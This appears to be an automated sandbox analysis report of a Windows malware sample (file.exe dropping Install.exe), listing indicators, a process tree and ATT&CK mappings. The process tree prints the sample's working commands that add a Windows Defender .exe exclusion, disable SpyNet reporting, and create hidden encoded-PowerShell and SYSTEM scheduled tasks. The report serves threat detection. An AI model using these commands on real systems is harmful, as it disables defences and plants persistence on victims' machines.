324edc8acd355934c63a1fcaa6c4793d681302fa49d4f5233eaeafdc366e34ab

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	Install.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bKFjthDDlmdmBdSpYV.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
1352	schtasks.exe
816	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1844	powershell.EXE
1844	powershell.EXE

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1844	powershell.EXE

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 1492 wrote to memory of 4248	1492	file.exe	79
PID 1492 wrote to memory of 4248	1492	file.exe	79
PID 1492 wrote to memory of 4248	1492	file.exe	79
PID 4248 wrote to memory of 3668	4248	Install.exe	80
PID 4248 wrote to memory of 3668	4248	Install.exe	80
PID 4248 wrote to memory of 3668	4248	Install.exe	80
PID 3668 wrote to memory of 2548	3668	Install.exe	82
PID 3668 wrote to memory of 2548	3668	Install.exe	82
PID 3668 wrote to memory of 2548	3668	Install.exe	82
PID 3668 wrote to memory of 3104	3668	Install.exe	84
PID 3668 wrote to memory of 3104	3668	Install.exe	84
PID 3668 wrote to memory of 3104	3668	Install.exe	84
PID 2548 wrote to memory of 3324	2548	forfiles.exe	86
PID 2548 wrote to memory of 3324	2548	forfiles.exe	86
PID 2548 wrote to memory of 3324	2548	forfiles.exe	86
PID 3324 wrote to memory of 4264	3324	cmd.exe	87
PID 3324 wrote to memory of 4264	3324	cmd.exe	87
PID 3324 wrote to memory of 4264	3324	cmd.exe	87
PID 3104 wrote to memory of 4572	3104	forfiles.exe	88
PID 3104 wrote to memory of 4572	3104	forfiles.exe	88
PID 3104 wrote to memory of 4572	3104	forfiles.exe	88
PID 3324 wrote to memory of 3380	3324	cmd.exe	89
PID 3324 wrote to memory of 3380	3324	cmd.exe	89
PID 3324 wrote to memory of 3380	3324	cmd.exe	89
PID 4572 wrote to memory of 4928	4572	cmd.exe	90
PID 4572 wrote to memory of 4928	4572	cmd.exe	90
PID 4572 wrote to memory of 4928	4572	cmd.exe	90
PID 4572 wrote to memory of 4832	4572	cmd.exe	91
PID 4572 wrote to memory of 4832	4572	cmd.exe	91
PID 4572 wrote to memory of 4832	4572	cmd.exe	91
PID 3668 wrote to memory of 1352	3668	Install.exe	92
PID 3668 wrote to memory of 1352	3668	Install.exe	92
PID 3668 wrote to memory of 1352	3668	Install.exe	92
PID 3668 wrote to memory of 3448	3668	Install.exe	94
PID 3668 wrote to memory of 3448	3668	Install.exe	94
PID 3668 wrote to memory of 3448	3668	Install.exe	94
PID 1844 wrote to memory of 3548	1844	powershell.EXE	98
PID 1844 wrote to memory of 3548	1844	powershell.EXE	98
PID 3668 wrote to memory of 1816	3668	Install.exe	103
PID 3668 wrote to memory of 1816	3668	Install.exe	103
PID 3668 wrote to memory of 1816	3668	Install.exe	103
PID 3668 wrote to memory of 816	3668	Install.exe	105
PID 3668 wrote to memory of 816	3668	Install.exe	105
PID 3668 wrote to memory of 816	3668	Install.exe	105

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1492
- C:\Users\Admin\AppData\Local\Temp\7zS6C8A.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4248
- - C:\Users\Admin\AppData\Local\Temp\7zS7053.tmp\Install.exe
    .\Install.exe /S /site_id "525403"
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks computer location settings
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:3668
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2548
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3324
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:4264
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:3380
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3104
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4572
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:4928
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:4832
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gSmiMIuyi" /SC once /ST 13:00:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:1352
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gSmiMIuyi"
      4⤵
      PID:3448
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gSmiMIuyi"
      4⤵
      PID:1816
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bKFjthDDlmdmBdSpYV" /SC once /ST 14:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\VXuqdfXGxZocYTe\VvVnnyM.exe\" JF /site_id 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1844
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:3548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4060

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1136

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Credential Access

Discovery

Query Registry

System Information Discovery